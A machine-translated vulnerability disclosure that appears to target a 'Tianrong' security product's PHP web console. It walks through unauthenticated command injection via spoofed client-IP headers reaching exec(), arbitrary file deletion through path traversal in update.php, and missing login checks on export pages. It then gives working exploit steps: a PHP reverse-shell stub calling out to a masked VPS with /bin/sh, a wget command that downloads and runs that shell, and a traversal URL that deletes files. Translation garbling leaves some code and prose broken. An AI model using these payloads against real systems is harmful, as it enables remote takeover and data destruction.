Tianrong top five high-risk vulnerability Gift Packs final edition (No Logon required)

Tianrong top five high-risk vulnerability Gift Packs final edition (No Logon required)

Tianrong believes that many high-risk vulnerabilities in topic terminal gift packs, command execution, Arbitrary File Deletion, global design defects, etc., do not need to log on, successful shell.

0x01 multiple Command Execution Vulnerabilities

File direct/polling/CommandsPolling. php

include_once 'command/CCmdsPolling.php';$command = isset($_POST['command'])?$_POST['command']:"";$saveFile = isset($_POST['filename'])?$_POST['filename']:"";$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:"";$cmdParam = trim($cmdParam);$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "") ));//command is nullif(empty($command)){      echo $faultStr;    exit();}//exec and get result$result = array();$pollingObj = new CCmdsPolling();if($command == "ping") {    $result = $pollingObj->getPingInfo($cmdParam, $saveFile);} else if ($command == "traceroute") {    $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);} else {    echo $faultStr;    exit();}

First, run the following command:

When $ command = "ping", $ partition PARAM and $ saveFile enter the getPingInfo function.

Follow-up file command/csf-spolling. php
 

Function getPingInfo ($ pingIp, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: ping ($ pingIp ); // send the command for the first time, execute the command, and generate the required file}

When $ saveFile is null, continue to follow up the ping function.
 

function ping($ip)    {        if(empty($ip))            return "";                $filename = "/tmp/" . self::getClientAddr()."ping".$ip.".txt";        if($ip && $filename) {            if(file_exists($filename) ) {                unlink($filename);            }            $cmd = "ping -c 5 $ip > $filename  2>&1 &";            exec("$cmd ");          }        return $filename;    }

Pay attention to the $ filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";

Continue to follow up the getClientAddr Function
 

function getClientAddr(){        unset($onlineip);          if($_SERVER['HTTP_CLIENT_IP']) {              $onlineip=$_SERVER['HTTP_CLIENT_IP'];          }else if($_SERVER['HTTP_X_FORWARDED_FOR']) {              $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];          }else {              $onlineip=$_SERVER['REMOTE_ADDR'];          }        return $onlineip;    }

Obtain the ip address directly here, and then return, ignoring the system's GPC = on

The last $ filename is controllable and is executed in exec.
Of course, the ip address here also enters cmd and is executed in exec. Some people Submit the ip address here.
Second, run the command

When $ command = "traceroute", $ extract PARAM and $ saveFile enter the getTracerouteInfo function.

Follow up with the getTracerouteInfo function, file command/c?spolling. php
 

Function getTracerouteInfo ($ address, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: traceroute ($ address ); // send the command for the first time, execute the command, and generate the required file}

Follow up the traceroute function:
 

function traceroute($address)    {        if(!$address)            return "";                $filename = "/tmp/". self::getClientAddr()."traceroute".$address.".txt";        if($address && $filename) {            if(file_exists($filename)) {                unlink($filename);            }            $cmd = "traceroute -m " . self::trace_max_hops . " -n $address > $filename 2>&1 &";            exec("$cmd ");         }        return $filename;    }

Pay attention to the $ filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";

Continue to follow up the getClientAddr Function
 

function getClientAddr(){        unset($onlineip);          if($_SERVER['HTTP_CLIENT_IP']) {              $onlineip=$_SERVER['HTTP_CLIENT_IP'];          }else if($_SERVER['HTTP_X_FORWARDED_FOR']) {              $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];          }else {              $onlineip=$_SERVER['REMOTE_ADDR'];          }        return $onlineip;    }

Obtain the ip address directly here, and then return, ignoring the system's GPC = on

The last $ filename is controllable and is executed in exec.
Of course, the ip address here also enters cmd and is executed in exec. Some people Submit the ip address here.

0x02 Arbitrary File Deletion vulnerability in multiple locations

First, delete the file:

File/task/webapi/update. php

require_once("datalayer/CDatalayer.php");include_once "base/CShellExec.php";$shell = new CShellExec();$dl = new DataLayer();$cn = $dl->connectDB();$dl->queryDB($cn,"use scandb");$dl->queryDB($cn,"delete from t_pluginadding");$success = false;$result = $dl->queryDB($cn,"select * from t_SystemProperty where System_Property='vul_current_version'");$row = $dl->fetchArray($result);$vulCurrentVersion = $row["System_Value"];$dl->queryDB($cn,"update t_SystemProperty set System_value='$vulCurrentVersion' where System_Property='vul_old_version'");set_time_limit(0);if($_GET["package"]){$filename = $_GET["package"];$tmpFilename = "/tmp/update_".time().".des";$filename = trim($filename,"\\");$filename = "/tmp/".$filename;$cmd = "/usr/sbin/openssl enc -des -d -a -in ".$filename." -out ".$tmpFilename." -pass pass:[email protected]"; $shell->Execute($cmd,"",true);$dirname = $tmpFilename.".dir";mkdir($dirname,0777);}else{......}......unlink($filename);unlink($tmpFilename);system("rm -rf ".$dirname);echo $success;?>

You can see $ filename = $ _ GET ["package"];

After some operations, there is no exit

At last, $ filename enters unlink, causing any file to be deleted.
Of course, commands are also executed here, where $ shell-> Execute

Because someone has already submitted it, I will not repeat it.

Delete files in the second and third places:

File direct/polling/CommandsPolling. php
 

include_once 'command/CCmdsPolling.php';$command = isset($_POST['command'])?$_POST['command']:"";$saveFile = isset($_POST['filename'])?$_POST['filename']:"";$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:"";$cmdParam = trim($cmdParam);$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "") ));//command is nullif(empty($command)){      echo $faultStr;    exit();}//exec and get result$result = array();$pollingObj = new CCmdsPolling();if($command == "ping") {    $result = $pollingObj->getPingInfo($cmdParam, $saveFile);} else if ($command == "traceroute") {    $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);} else {    echo $faultStr;    exit();}

$ Saveparam, $ saveFile parameters enter the getPingInfo and getTracerouteInfo functions respectively.

Follow up with the getPingInfo and getTracerouteInfo Functions
 

Function getPingInfo ($ pingIp, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: ping ($ pingIp ); // send the command for the first time, execute the command, and generate the required file }...... function ping ($ ip) {if (empty ($ ip) return ""; $ filename = "/tmp /". self: getClientAddr (). "ping ". $ ip. ". txt "; if ($ ip & $ filename) {if (file_exists ($ filename) {unlink ($ filename );} $ cmd = "ping-c 5 $ ip> $ filename 2> & 1 &"; exec ("$ cmd") ;}return $ filename ;}...... function getClientAddr () {unset ($ onlineip); if ($ _ SERVER ['HTTP _ CLIENT_IP ']) {$ onlineip = $ _ SERVER ['HTTP _ CLIENT_IP'];} else if ($ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) {$ onlineip = $ _ SERVER ['HTTP _ X_FORWARDED_FOR'];} else {$ onlineip = $ _ SERVER ['remote _ ADDR '];} return $ onlineip ;}

Visible in the getPingInfo function, and then enter the ping function when $ saveFile is empty.

Then in the ping function:

$ Filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";

In the getClientAddr function, retrieve the IP address from $ _ SERVER and return

So here we ignore GPC, and when this system is on, GPC = on's

Finally, the $ filename in the ping function is controllable, and $ filename enters the unlink function.

$ Filename value can be truncated at % 00, causing deletion of arbitrary files
The third part is the same as the second part.

In the traceroute function, $ filename is controllable and $ filename enters the unlink function.

$ Filename value can be truncated at % 00, causing deletion of arbitrary files

0x03 global design defects

Why is it global? Because this is a security product, it is said that all active/active functions should be post-login operations.

However, the corresponding function operation here is that the logon status is not verified at all.

Therefore, the global page function can be operated without logon.

This system has a global logon verification function:

For example, in the direct/polling/progressbarPolling. php file
 

If (! ($ UserName = GetSessionVariable ('username') {// obtain the logon userName echo json_encode (array ('type' => 'event ', 'name' => 'np _ probe_device_alive_event ', 'data' => false); exit ();}

The logon status is verified here. If the session does not contain username, exit. Check the GetSessionVariable function.

File base/session. php
 

function GetSessionVariable($key){    return $_SESSION[netpower][$key];}

Get userName from session

However, such verification is not used in more than 95% of the regions.

For example, device/device_export.php can directly export device information.

Distribute/vuldetial. php plug-in vulnerability information

Policy/param_export.php policy information Export

Task/task_export.php task information Export

And so on.

Command Execution proof:

When command = ping, filename is empty, and limit Param is not empty

1. Place shell. php on vps with the following content:
 

$sock=fsockopen("*.*.*.*",61234);exec("/bin/sh -i <&3 >&3 2>&3");?>

2. Run the command here to download the shell. php file to the target tmp directory.
 

wget  http://*.*.*.*:8888/shell.php -O /tmp/shell.php

 

3. Run the following command to execute the downloaded/tmp/shell. php file.
 

php -f /tmp/shell.php

 

4. Successful shell Rebound
 

The same is true when command = traceroute



Proof of File Deletion:

Upload a file without logging on to the file due to design defects.

File device/device_import.php
 

/** Upload File */$ UploadAction = 0; $ TimeLimit = 60; /* set the time-out limit. The default time is 30 seconds. If it is set to 0, it is not limited. */set_time_limit ($ TimeLimit ); if (move_uploaded_file ($ _ FILES ["importUpload"] ["tmp_name"], "/tmp /". $ _ FILES ["importUpload"] ["name"]) {chmod ("/tmp /". $ _ FILES ["importUpload"] ["name"], 0777); echo '{success: true, file :'. json_encode ('file has been stored :'. '/tmp /'. $ _ FILES ['ortupload'] ['name']). '}';} else {echo '{faliure: true, file: Upload Error !} ';} Set_time_limit (30); // restore the default timeout setting?>

Upload the file to tmp:
 

Uploaded successfully:
 

Send request:
 

**.**.**.**/task/webapi/update.php?package=../../../../../../../tmp/1

You can delete the file/tmp/1.
 

 

Deleted